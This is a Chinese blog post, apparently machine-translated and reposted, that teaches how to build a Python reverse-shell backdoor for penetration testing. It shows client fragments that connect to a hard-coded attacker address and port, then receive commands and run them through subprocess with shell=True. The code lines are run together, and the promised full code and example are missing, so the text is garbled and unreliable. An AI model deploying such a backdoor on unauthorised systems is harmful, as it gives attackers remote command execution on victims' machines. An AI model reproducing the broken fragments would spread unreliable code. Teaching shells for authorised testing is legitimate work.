在 Python 中创建后门

在 Python 中创建后门

后门的主要目的是向目标机器发送和接收命令(和数据),以获得有价值的数据或增加目标机器和网络的权限。

为了促进这种交互,黑客在目标机器上安装恶意代码,创建连接并允许黑客发送信息。

Shell 是道德黑客可以用来在合同期间进行渗透测试的重要软件。在本文中,我们将教有抱负的道德黑客如何制作他们的第一个外壳。

资源: https://www.ivoidwarranties.tech/posts/pentesting-tuts/metasploit/simple-attack/

在信息安全领域内,存在两种类型的有效载荷:shell 和反向 shell。

Shell 直接在黑客可以连接的目标机器上创建一个服务器。

反向 shell 有一个客户端组件和一个服务器组件。客户端在已经拥有攻击者 IP 地址的目标机器上运行。

因为初始连接的方向是“反向的”(如从受害者到攻击者),所以外壳被称为反向外壳。展望未来,我们将编写一个反向 shell。目标将被称为受害者,黑客的机器称为攻击者。

首先,我们必须创建将在攻击者身上运行的服务器。有以下四个步骤:

  1. 获取我们的本地 IP 和指定的端口。
  2. 绑定 IP 和端口以创建套接字。
  3. 启动监听器。
  4. 在无限循环中发送和接收命令。

接下来,我们将基于硬编码的 IP 和端口连接到攻击者,因为它无法动态检索这些。

因为我们在本地机器上运行这个反向 shell,所以套接字看起来像这样:

 REMOTE_HOST = '127.0.0.1'REMOTE_PORT = 8081 # 2222client = socket.socket()

此外,我们必须接收命令并使用库 子进程 打开终端并并行运行命令。这就是它的样子:

 command = client.recv(1024)command = command.decode()op = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

服务器的完整代码如下:

下面是一个反向 shell 的例子:

左边是客户端,右边是服务器。

首先运行服务器,然后运行客户端将允许用户按照承诺使用服务器发送和接收数据。请检查一下,让我知道你的想法。

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明

本文链接:https://www.qanswer.top/36870/51311609

posted @ 2022-09-16 09:52  哈哈哈来了啊啊啊  阅读(298)  评论(0编辑  收藏  举报